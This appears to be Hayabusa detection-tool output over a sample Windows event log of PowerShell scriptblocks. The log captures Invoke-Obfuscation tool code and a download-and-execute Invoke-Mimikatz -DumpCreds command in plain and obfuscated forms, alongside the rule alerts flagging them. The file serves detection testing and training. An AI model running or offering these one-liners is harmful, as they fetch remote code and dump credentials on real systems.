'36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. '((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. '((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.309 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:56.683 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:56.745 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_.ModuleType -eq 'Manifest'},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:05.348 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:32.699 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_[1].Trim()},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:32.703 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:32.714 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace($_,'')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:37.997 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:12.146 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:39.237 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:47.492 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:17:57.725 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:01.084 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".((Gv '*mDR*').nAmE[3,11,2]-jOiN'')((('IEX (New'+'-Ob'+'jec'+'t Net.WebClient).DownloadString({0}ht'+'tps://'+'raw.git'+'hubus'+'ercontent.com/mattifest'+'ation/Po'+'werSploit/ma'+'st'+'er/Exfil'+'t'+'r'+'ati'+'on/Invoke'+'-Mimika'+'t'+'z'+'.ps1{'+'0}); Inv'+'oke-'+'Mi'+'m'+'ikat'+'z -Dum'+'p'+'Creds') -f[cHaR]39))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:01.084 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:19.204 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:44.958 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $PsHome[4]+$pshOME[34]+'X') ((((""{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{10}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{31}{85}{88}{72}{25}{63}{32}{5}{39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{79}{20}{11}{59}{45}{17}{24}{84}{33}{21}{48}{71}{18}{23}{16}{28}{29}{80}{74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55}{8}"" -f'r','tiyJa','Ja','a*mDR*yJa).nAmE','it/ma','tyJ','IEX (New','ient)',')) ','CredsyJa','a','-M','dSt','J','3,11','J','nvyJa','t','yJa0','.D','keyJa+yJa','yJa+yJ','-ObyJa+','}); I','yJa','yJatps://yJa','aercontent.com','yJ','+','yJaoke-yJa+','ma','i','gi','z','+','+','Ja','yJa+y','myJa','a+yJahub',',2]-jOiNyJayJ','ebCl','/','at Ne','t.W','Ja+yJa','usyJa+','ty','a.ps1','yJa+yJaa','ow','Jas','DumyJa+yJa','yJa','Ja','cHaR]39','a+yJaer/','yJ',') -f[','imikay','ecyJ','pyJa+','ikaty','+yJaraw.','.','yJ','xfilyJa+yJatyJa+','a)(((yJa','nloa','Jaz -','yJa+y','{yJa+','}htyJa+','a+yJaat','yJa+y','ion/','sty','ttife','Ja+y','aon/Invo','yJaMi','+y','PoyJa','yJar','+yJa','ng({','+yJawerSplo','yJaj','0','E','((Gv yJ','[')) -cRepLAce ([ChaR]121+[ChaR]74+[ChaR]97),[ChaR]39))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:18:50.150 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:19:05.622 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Set-vaRiablE (""2K""+""h8"") ( ""NoIsSeRpxE-EkOVnI | )63]RAhc[,'6V0' eCALpER- 43]RAhc[,'t3a'eCALpER- 93]RAhc[,)17]RAhc[+48]RAhc[+37]RAhc[( ecalPerC- )' ))93]RahC[,)79]RahC[+47]RahC[+121'+']RahC[( ecALpeRc- ))G'+'TI['+'GTI,GTIJy vG((GTI,GTIEGTI,GTI0GTI,GTIjaJyGTI,GTIolpSrewaJy+GTI,GTI{(gnGTI,GTIa'+'Jy+GTI,GTIraJyGTI,GTIaJ'+'yoPGTI,GTIy+GTI,GTIiMaJyGTI,GTIovnI/noaGTI,GTIy+aJGTI,GTIefittGTI,GTIytsGTI,GTI/noiGTI,GTIy+aJyGTI,GTItaaJ'+'y+aGTI,GTI+aJyth}GTI,GTI+aJy{GTI,GTIy+aJyGTI,GTI- zaJGTI,GTIaolnGTI,GTIaJy((()aGTI,GTI+aJytaJy+aJylifxGTI,GTIJyGTI,GTI.GTI,GTI.waraJy+GTI,GT'+'IytakiGTI,GTI+aJypGTI,GTIJyceGTI,G'+'TIyakimiGTI,GTI[f- )GTI,GTIJyGTI,GTI/reaJ'+'y+aGTI,GTI93]RaHcGTI,GTIaJGTI,GTIaJyGTI'+',GTIaJy+a'+'Jym'+'uDGTI,GTIsaJGTI,GTIwoGT'+'I,GTIaaJy+aJyGT'+'I,GTI1sp.aGTI,GTIytGTI,GTI+aJys'+'uGTI,GTIaJy+aJGTI,GTIW.tGTI,GTIeN taGTI,GTI/GTI,GTIlCbeGTI,GTIJyaJy'+'NiOj-]2,GTI,GTIbuhaJy+aGTI,GTIaJymGTI,GTIy+aJyGTI,GTIaJGTI,GTI+GTI,GTI+GTI,GTIzGTI,GTIigGTI,GTIiGTI,GTIamGTI,GTI+aJy-ekoaJyGTI,GTI+GTI,GTIJyGTI,GTImoc.tnetnocreaGTI,GTIaJy//:sptaJyGTI,GT'+'IaJyGTI,GTII ;)}GTI,GTI+aJybO-GTI,GTI'+'J'+'y+aJyGTI,GTIaJy+aJyekGTI'+',GTID.GTI,GTI0aJyGTI,GTI'+'tGTI,GTIaJyvnGTI,GTIJGTI,GTI11,3GTI,GTIJGTI,GTItSdGTI,GTIM-GTI,GTIaGTI,GTIaJysderCGTI,GTI ))GTI,GTI)tneiGTI,GTIweN( XEIGTI,GTIJytGTI'+',GTIam/tiGTI'+',GTIEmAn.)aJy*RDm*aGTI,GTIaJGTI,GTIaJyitGTI,GTIrGTIf- t3a}8{}'+'55{}85{}9{}35{}16{}25{}96{}87{}26{}45{}18{}83{}2{}47'+'{}08{}92{}82{}61{}32{}81{}17{}84{}12{}'+'33{}48{}42{}71{}54{}9'+'5{}11{}02{}9'+'7{}72{}43{}1{}94{}38{}66{}98{}65{}31{}74{}15{}07{}4{}68{}28{}57{}37{}51{}67{}77{}03{}24{}62{}56{}64{}93'+'{}5{}23{}36{}52{}27{}88{}58{}13'+'{}0{}21{}86{}05{}91{}7{}14{}44{}34{}75{}53{}0'+'1{}06{}78{}22{}63{}73{}6{}76{}04{}41{}19{}3{}09{}46{t3a(((( )GTIXGTI+]43[EMOhsp6V0+]4[emoHsP6V0 (&'(("" ); .( $pshOME[4]+$PshOMe[34]+'x')( [STRInG]::jOiN( '', ( variabLE (""2K""+""H8"")).VAluE[ -1 ..-(( variabLE (""2K""+""H8"")).VAluE.leNGTH) ]) 